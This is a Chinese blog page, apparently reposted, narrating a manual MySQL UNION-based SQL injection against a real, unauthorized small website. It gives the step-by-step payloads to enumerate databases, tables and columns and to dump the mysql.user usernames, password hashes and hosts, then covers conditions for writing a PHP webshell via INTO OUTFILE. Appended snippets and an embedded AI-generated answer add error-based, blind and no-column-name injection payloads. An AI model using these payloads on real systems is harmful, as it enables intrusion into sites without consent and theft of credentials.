记一次MySQL手工注入

最新推荐文章于 2025-09-11 20:53:34 发布
转载 最新推荐文章于 2025-09-11 20:53:34 发布 · 93 阅读 · 0 ·
CC 4.0 BY-SA版权
原文链接:http://www.cnblogs.com/co10rway/p/7979750.html
文章标签:

#数据库 #php

本文介绍了一次手工SQL注入攻击的过程,包括检测注入点、爆破数据库、表名、字段及数据等步骤,并探讨了利用SQL注入写入木马的条件。

本来想找个装安全狗的站试下绕过,safe dog没找到,但随便一搜搜到一个小站有SQLi,正好借此机会复习下手工注入(新版Firefox我吐槽一下,hackbar这么好用的工具,说阉割就阉割,哎)

小站没有上WAF,用1=1、1=2就可以检测注入点,就不放截图了。

然后order by 、联合查询什么的也都是基本操作。。直接进入最关键的手工爆表好了。(已知第二列和第三列有回显,MySQL version是5.6,所以直接从information_schema中就可以方便的查询)

1、爆其他数据库;

查询语句为:xxx?id=-4 union select 1,SCHEMA_NAME,3,4,5,6,7,8 FROM information_schema.schemata

页面返回为:

2、爆其他表(数据库选择刚才爆出的mysql)

查询语句为:xxx?id=-4 union select 1,TABLE_NAME,3,4,5,6,7,8 FROM information_schema.tables WHERE TABLE_SCHEMA=0x6d7973716c


这里的0x6d7973716c是mysql的十六进制表示,如果直接写mysql字符串的话数据库是不能解析的,所以要传递16进制形式的数据库名

这里有很多表,我们只需关注user表就可以,其实其他的表也会存放一些敏感数据,比如该网站的注册会员的登录信息等等,但我们目标是服务器。

3、爆字段

查询语句为:xxx?id=-4 union select 1,COLUMN_NAME,3,4,5,6,7,8 FROM information_schema.columns WHERE TABLE_NAME=0x75736572

同理,0x75736572是user表的十六进制表示。

这里我们可能关心的是以上三列的数据,user、password、host,让我们进行最后的爆数据吧!

4、爆数据

查询语句为:xxx?id=-4 union select 1,concat_ws(0x2c,User,Password,Host),3,4,5,6,7,8 FROM mysql.user

由于我要查询的有三列数据,所以这里我用了concat_ws函数进行拼接后输出,0x2c是逗号

 

 

 done,手工测试到此完成,可以说是非常非常普通的正规思路了,没有一点绕过的地方直接搞就行了。

其实这里我尝试用into outfile写php的一句话木马,但是发现没有成功,编码也不行,一直报mysql_fetch_array(): supplied argument is not a valid MySQL result resource的错误。

 查了一些资料,使用mysql直接写入木马的必要条件有三:

1、root权限(排除)

2、知道网站根目录的地址(排除,从随便一个报错信息中都可以爆出物理绝对路径)

3、magic_quotes_gpc()=OFF(有可能)

4、没有write权限(有可能)

 用sqlmap跑下试试,看来的确如此

大概就这些吧。

#########################

 谁能告诉我为什么发布以后布局这么丑,蛋疼

转载于:https://www.cnblogs.com/co10rway/p/7979750.html

一次墨者mysql手工sql注入
qq_56035503的博客
07-22 887
sql注入实质是通过sql语句对于其过滤不严谨的一次语句执行,说白了就是通过sql语句执行相关内容,对sql语句的学习内容要求较高,需要熟悉sql语法和数据库环境,另外如果不知道账号和密码存放表是很难进行查询的。
Mysql手工注入
luopanhong的博客
03-18 4222
MySQL手工注入SQL注入注入的手法或者工具上分类的话可以分为:· 手工注入(手工来构造调试输入payload)· 工具注入(使用工具,如sqlmap)下面主要讲解的是如何通过手工来显式注入MySQL数据库。说到显式注入,SQL又可以分为:· 显式注入· 盲注入这两种分类的主要区别在于能否从页面上直接获取数据库信息。手工注入流程判断注入注入的第一步是得判断该处是否是一个注入点。或者说判断此处...
Mysql暴错注入代码
收集盒 Book box
03-11 771
<br />MySql Error Based Injection Reference<br />[Mysql暴错注入参考]<br />Author:Pnig0s1992<br />Blog:http://pnig0s1992.blog.51cto.com/<br />TeAm:http://www.FreeBuf.com/<br />Mysql5.0.91下测试通过,对于5+的绝大部分版本可以测试成功<br />小部分版本使用name_const()时会报错.可以用给出的Method.2测试<br />查
mysql注入漏洞手注
一个码农的笔记
09-29 6181
mysql: 报错注入: 以http://www.hexie.com/main/articleDetail.php?id=757 为例子: http://www.hexie.com/main/articleDetail.php?id=757' 报错 方法一:(1)http://www.hexie.com/main/articleDetail.php ?id=757' and (sel
一次MySQL手工注入案例
乐枕的家
11-29 878
一次手动注入学校某站MySQL的过程 信息收集发现方式子域名扫描 -> 导入awvs -> 批量扫blind-injectionurlhttp://home.bjtu.edu.cn/info(whatweb) 202.112.147.124(学校内网) Apache/2.4.9 Win64 PHP/5.5.12 parameterhttp://home.bjtu.edu.cn/ctrl/vo
手残党都可以学会的mysql手工注入
大家好
12-13 1528
schema_name:information_schema.schemata数据库名信息的列名值 table_schema:information_schema.tables数据库名的列名值。这个语句的目的是验证条件的结果是否影响查询的响应时间。这个UNION查询选择了6个列,并从information_schema.tables表中返回指定数据库(demo01)中的所有表名的组合字符串。这个UNION查询选择了6个列,并在第4列返回数据库版本,第5列返回操作系统信息,其他列返回常量值。
asp mysql 注入_一次有意义的asp手工注入
weixin_35355431的博客
02-23 497
今天在空间发了篇日志,问朋友们有没有什么需要我这个小菜检测一下的网站,日志发出后,有位朋友来留了一个网站的地址:呵呵,当时听那朋友说的,他们好多人都不行,拿不下,我被吓到了,呵呵,想着别人那么多人都拿不下的站,我一个小菜鸟能拿下?呵呵,不过还是抱着试试看的心情打开了这个网站,在主站转了转,用的是CMS,由于俺是小菜,对CMS不懂,于是找到后台,看可否直接登录,后台地址为:但是,打开之后发现页面跳转...
mysql手工注入技巧,sql手工注入技巧总结
weixin_29115107的博客
03-18 1227
基于报错的注入分为两种,直接填入表达式报错,或使用外层表达式报错时返 回被嵌套的子查询的结果Mysql:Where id=1 and !(Select * from (select user())x)-~0;//Big Int Overflow(大整数溢出报错)and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1));and extr...
一次注册功能处Mysql手工报错注入
qq_36270253的博客
04-01 4246
一次注册功能处Mysql手工报错注入 知识点:报错注入是使用一些指定的函数来制造报错,从而从报错信息中获取设定的信息,比如select/insert/update/delete都可以使用报错来获取信息,报错注入的使用前提条件,是后台没有屏蔽数据库的报错信息,在语法发生错误的时候会显示在客户前端页面。 /////////分////////////割/////////\\\\\\线\\\\\\\\\\\ 安卓app除了反编译apk外,各功能点也有几率存在漏洞,甚至攻防演练的时候也可以从app资产寻找突破口。
Mysql数据库手工注入-编码绕过
qq_62793621的博客
11-11 298
拒绝脚本小子,sql手工注入
一篇墨者学院SQL手工注入漏洞测试(MySQL数据库)write up
2403_87248548的博客
05-16 1190
最后再把整体的一个思维导图放下面给大家看一下吧!我把整个流程一次从左到右依次列了出来希望对大家有所帮助!
一次墨者学院sql手工宽字节注入(包含使用sqlmap宽字节注入)
qq_56035503的博客
07-26 1034
总的来说使用sqlmap的前提是需要知道当前漏洞注入是属于宽字节的注入才行,所以也间接证明了手动注入学习的重要性,只有知道了注入的原理,才能正确的使用脚本,同时sql内容的学习也极其关键,如果不能明白其中的原理,在实战中也不发现不了其中的问题。
墨者靶场—SQL手工注入漏洞测试(MySQL数据库)
weixin_46694260的博客
03-23 7418
0x00 前言 学SQL注入也有一段时间了,找了一个在线靶场,这个题目基本上学会最基本的注入原理和方法都能拿下,废话就不多说了,直接来演示吧~菜鸟渗透,大佬勿喷 0x01 过程 首先我们先稍微看一下题目 通过题目我们可以看出靶场环境是Nginx+PHP+MySQL 那我们现在启动、进入靶场 ...
Redis哨兵
2502_92141759的博客
09-10 686
哨兵的结构如图::Sentinel 会不断检查您的master和slave是否按预期工作:如果master故障,Sentinel会将一个slave提升为master。当故障实例恢复后也以新的master为主:Sentinel充当Redis客户端的服务发现来源,当集群发生故障转移时,会将最新信息推送给Redis的客户端。
为什么要显示调用析构函数
最新发布
python_girl9475的博客
09-11 208
如果类内存在手动申请的资源、数据库连接、文件句柄、网络连接,则无法释放,会造成资源泄露。
SAP HANA Scale-out 03:Performance Guide
SAP攻城狮
09-10 1030
HEX EngineThe SAP HANA Execution Engine (HEX)是一个查询执行引擎,从长远来看将取代其他SAP HANA引擎,如连接引擎和OLAP引擎.所有功能都整合在HEX中,从而消除不同引擎之间的物化过程。HEX引擎通过在准备阶段创建适当的SQL计划来连接SQL层和存储层。HEX引擎中的数据是流式处理的,因此可以快速获取第一批结果行,而无需等待所有结果行都被处理。HEX引擎中的操作符是管道化的,改进了并行化并可以减少内存消耗。
计算机毕设 java 高校饭堂点餐系统 基于微信小程序 + SSM 的高校餐饮服务平台 Java+MySQL 的点餐与运营系统
毕设源码伍学长
09-10 876
在高校饭堂就餐需求增长的背景下,传统点餐依赖窗口排队、效率低,存在高峰期拥堵、菜品信息不透明等问题,难以满足师生便捷就餐需求。采用 Java 技术、SSM 框架、Uni-weixin 技术及 MySQL 数据库,开发高校饭堂点餐系统(微信小程序端 + 服务端),整合菜品展示、在线点餐、订单跟踪等功能,支持管理员、商家、用户三类角色协同,打造专业化餐饮服务平台。该系统既能帮助管理员监管平台内容,商家高效管理菜品与订单,又能让用户便捷查询菜品、完成点餐,提升高校饭堂服务效率与用户体验。
PostgreSQL打印实时查询语句(监控PostgreSQL监控)(未成功)
Dontla的博客
09-08 619
定期执行以下 SQL 语句(可通过脚本或。
知识图谱——图数据库与项目构建
renjt01的博客
09-10 379
知识图谱——图数据库与项目构建 一、图数据库 1.Neo4j 2.neo4j使用 3.创建节点 4.创建关系 5.删除所有节点和关系 6.效果展示 二、知识问答项目构建 1、前端构建 2、大模型进行问题分类和命名实体识别 3、python操作neo4j数据库 4、后端构建
MYsql进行SQL注入时怎么获取一个表的全部列名
09-11
<think> 首先,用户的问题是关于在MySQL中进行SQL注入时获取一个表全部列名的方法。用户提供了几个引用,我需要参考这些引用来构建回答。 回顾引用内容: - 引用[1]:讨论了SQL注入绕过正则及无列名注入,提到使用像`mysql.innodb_table_stats`之类的表来查出数据库名和表名,但查不出列名。然后提到通过连接特性一个一个取列名,或者使用无列名注入的方法,如`select 1,2,3,4,5 union select * from users;`,避免需要知道列名。 - 引用[2]:类似地,讨论了无列名注入,提到替代`information_schema`的系统表如`sys.schema_auto_increment_columns`等,用于在数据库名/表名/列名未知时寻找列名。 - 引用[3]:描述了SQL盲注获取数据库的表名、列名和数据的过程。具体包括使用`information_schema.columns`来获取列名,通过布尔盲注或时间盲注逐个字符推断。 - 引用[4]:展示了一个实际例子,使用`information_schema.COLUMNS`来查询特定表的列名。 用户的问题是:“我想了解在MySQL中进行SQL注入时获取一个表全部列名的方法”。所以,我需要总结获取MySQL表全部列名的SQL注入方法。 从引用中提取关键方法: 1. **使用`information_schema.columns`** :这是最常见的方法。引用[3]和[4]都提到了它。例如: - 查询特定表的列名:`SELECT column_name FROM information_schema.columns WHERE table_name = '表名'` - 在注入中,可以使用盲注来推断列名。 2. **无列名注入** :引用[1]和[2]讨论了这种方法,它避免直接查询`information_schema`,而是使用其他方式如连接特性或`union select *`来获取数据而不需要列名。 3. **替代系统表** :引用[2]提到在`information_schema`不可用时,使用其他系统表如`sys.schema_auto_increment_columns`或`mysql.innodb_table_stats`,但这些表可能只提供表名,不直接提供列名。 用户指定了“获取一个表全部列名的方法”,所以我应该专注于获取列名的具体技术。 结构化我的回答: - 由于系统指令要求使用中文回答,结构清晰。 - 包括行内数学表达式使用`$...$`,但这里可能不需要数学公式,除非涉及计算。 - 独立公式使用`$$...$$`,但SQL查询更适合用代码块。 - 生成相关问题在末尾。 - 在引用段落末尾添加引用标识,如[^1]。 回答结构: 1. **引言** :简要解释SQL注入中获取列名的重要性。 2. **主要方法** : a. **基于`information_schema.columns`的方法** :详细描述如何使用这个系统表查询列名,包括示例SQL注入语句。 b. **无列名注入方法** :解释如何在不查询列名的情况下访问数据。 c. **其他替代方法** :如果`information_schema`被屏蔽时的替代方案。 3. **安全注意事项** :提醒用户SQL注入是攻击行为,仅用于学习目的。 4. **相关问题** :生成几个相关问题。 生成相关问题: - 例如:如何绕过`information_schema`的限制?如何防范SQL注入?无列名注入的具体实现? 确保参考引用: - 在描述方法时,自然地添加引用标识,如[^1]、[^2]等,对应于提供的引用。 示例引用: - 当提到使用`information_schema.columns`时,参考引用[3]和[4]。 - 当讨论无列名注入时,参考引用[1]和[2]。 完整回答大纲: 1. **获取列名的方法** - **方法一:使用`information_schema.columns`系统表** - 描述:通过查询`information_schema.columns`表来获取指定表的所有列名。 - 示例注入语句:`SELECT column_name FROM information_schema.columns WHERE table_schema = DATABASE() AND table_name = '表名'` - 在盲注中,使用如`AND (SELECT SUBSTRING(column_name,1,1) FROM information_schema.columns WHERE table_name='表名' LIMIT 1)='a'`来逐个字符推断[^3][^4]。 - **方法二:无列名注入** - 描述:避免查询列名,直接通过连接特性或`union select *`来访问数据。 - 示例:`SELECT 1,2,3,4,5 UNION SELECT * FROM users;` 这不需要知道列名[^1]。 - **方法三:替代系统表** - 描述:当`information_schema`不可用时,使用像`sys.schema_auto_increment_columns`的表,但可能只能获取表名,不能直接获取列名[^2]。需要间接方法。 2. **总结** - 强调获取列名的常见方式。 3. **相关问题** - 生成3-4个相关问题。 最后,确保回答真实可靠,基于提供的引用。 </think> ### MySQL SQL注入中获取表全部列名的方法 在SQL注入攻击中,获取数据库表的结构(包括列名)是渗透测试的关键步骤。以下是基于MySQL数据库的常用方法,参考了您提供的引用资料。我将从易到难梳理获取一个表全部列名的技术,包括标准方法和替代方案。重点聚焦于`information_schema.columns`系统表和无列名注入技术。 #### 1. **使用`information_schema.columns`系统表(最常用方法)** MySQL的`information_schema.columns`表存储所有表和列的元数据。通过注入查询该表,可直接获取指定表的全部列名。 - **基本注入语句**: ```sql SELECT column_name FROM information_schema.columns WHERE table_schema = DATABASE() AND table_name = '表名' ``` 示例注入(如URL参数注入): `http://example.com/page?id=-1' UNION SELECT 1, group_concat(column_name separator ';'), 3 FROM information_schema.columns WHERE table_name='users'-- -` 这会返回所有列名拼接的字符串(如`id;username;password`)[^3][^4]。 - **在盲注场景下(无直接输出时)**: 使用布尔盲注或时间盲注逐个字符推断列名: - 布尔盲注:`id=1 AND (SELECT SUBSTRING(column_name,1,1) FROM information_schema.columns WHERE table_name='users' LIMIT 1)='u'` 通过变换`SUBSTRING`参数逐个字符猜测列名[^3]。 - 时间盲注:`id=1 AND IF(ASCII(SUBSTRING((SELECT column_name FROM information_schema.columns WHERE table_name='users' LIMIT 1),1,1))=117, SLEEP(5), 0)` 如果第一个字符是`u`(ASCII值117),则延迟5秒响应[^3]。 逐步增加`OFFSET`值遍历所有列名(如`LIMIT 1 OFFSET 0`、`OFFSET 1`等)。 #### 2. **无列名注入(当`information_schema`不可用时)** 如果目标系统屏蔽了`information_schema`(如WAF规则过滤),可使用无列名注入技术间接访问数据,无需查询列名。 - **基于`UNION SELECT *`的方法**: 通过`UNION`查询匹配列数,直接访问数据而不依赖列名: ```sql SELECT 1,2,3 UNION SELECT * FROM users; ``` 这里的`1,2,3`需匹配目标表列数(需提前确定列数),返回结果会显示数据,从而绕过列名查询[^1]。 - **使用连接特性或别名**: 结合`JOIN`或子查询匿名访问列: ```sql SELECT x.1, x.2 FROM (SELECT * FROM users) x; ``` 通过`x.1`、`x.2`等引用列位置,间接获取数据[^1]。 #### 3. **替代系统表方法(如`information_schema`被禁用)** 某些MySQL版本或配置下,可用其他系统表替代`information_schema`,但这些表通常只提供表名而非列名,需进一步注入: - **查询表名**:使用表如`mysql.innodb_table_stats`或`sys.schema_auto_increment_columns`: ```sql SELECT table_name FROM mysql.innodb_table_stats WHERE database_name = DATABASE(); ``` 获取表名后,仍需通过`information_schema.columns`或盲注获取列名[^1][^2]。 - **间接获取列名**: 如果替代表无效,通过猜测或错误消息推导列名(如触发`Unknown column`错误)。 #### 安全注意事项 - **仅用于授权测试**:SQL注入是攻击行为,以上方法应在合法渗透测试中使用,避免非法入侵。 - **防范措施**:开发中应使用参数化查询(如Prepared Statements)过滤输入,禁用敏感系统表访问。 ### 相关问题 1. 如何在`information_schema`被屏蔽时获取MySQL列名? 2. 无列名注入的具体实现步骤有哪些? 3. SQL盲注中如何高效推断表结构和数据? 4. 如何配置MySQL以防范列名泄露的SQL注入攻击? [^1]: SQL注入绕过正则及无列名注入总结。 [^2]: sql注入之无列名注入总结。 [^3]: sql盲注获取数据库的表名、列名和具体数据流程。 [^4]: 一次墨者mysql手工sql注入示例。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值